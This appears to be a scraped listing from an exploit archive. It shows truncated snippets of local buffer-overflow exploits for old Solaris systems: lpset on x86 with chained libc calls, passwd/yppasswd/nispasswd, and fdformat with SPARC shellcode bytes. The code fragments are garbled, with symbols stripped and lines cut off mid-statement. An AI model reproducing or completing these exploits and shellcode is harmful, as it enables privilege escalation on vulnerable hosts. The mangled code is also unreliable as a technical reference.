lpset.overflow

Here's an overflow exploit that works on a non-exec stack on x86 boxes. It demonstrates how it is possible to thread together several libc calls. I have not seen any other exploits for x86 that have done this.. for the lpset bug in sol7 x86. Tim N. define BASE 0xdff40000 define STACK 0x8047e30...

Solaris 2.4 passwd, yppasswd, and nispasswd Overflow Exploits

Exploit for solaris platform in category local exploits ============================================================= Solaris 2.4 passwd, yppasswd, and nispasswd Overflow Exploits ============================================================= ---------------------------- file newpass.c...

Solaris 2.4 passwd / yppasswd / nispasswd - Local Overflow

---------------------------- file newpass.c ------------------------------- include include define hiddenpasswd "/bin/hpasswd" /change here .../ define MAXLENGTH 32 void mainint argc, char argv int i; char args10; ifargc MAXLENGTH printf"You reached the maximum length in args\n"; exit0; else...

Solaris 2.4 /bin/fdformat Local Buffer Overflow Exploits

Exploit for solaris platform in category local exploits ======================================================== Solaris 2.4 /bin/fdformat Local Buffer Overflow Exploits ======================================================== --------------------------- lion24.c ---------------------------------...

Solaris 2.4 - '/bin/fdformat' Local Buffer Overflow

--------------------------- lion24.c --------------------------------- / Solaris 2.4 / include include include include define BUFLENGTH 264 define EXTRA 36 define STACKOFFSET -56 define SPARCNOP 0xa61cc013 uchar sparcshellcode = "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"...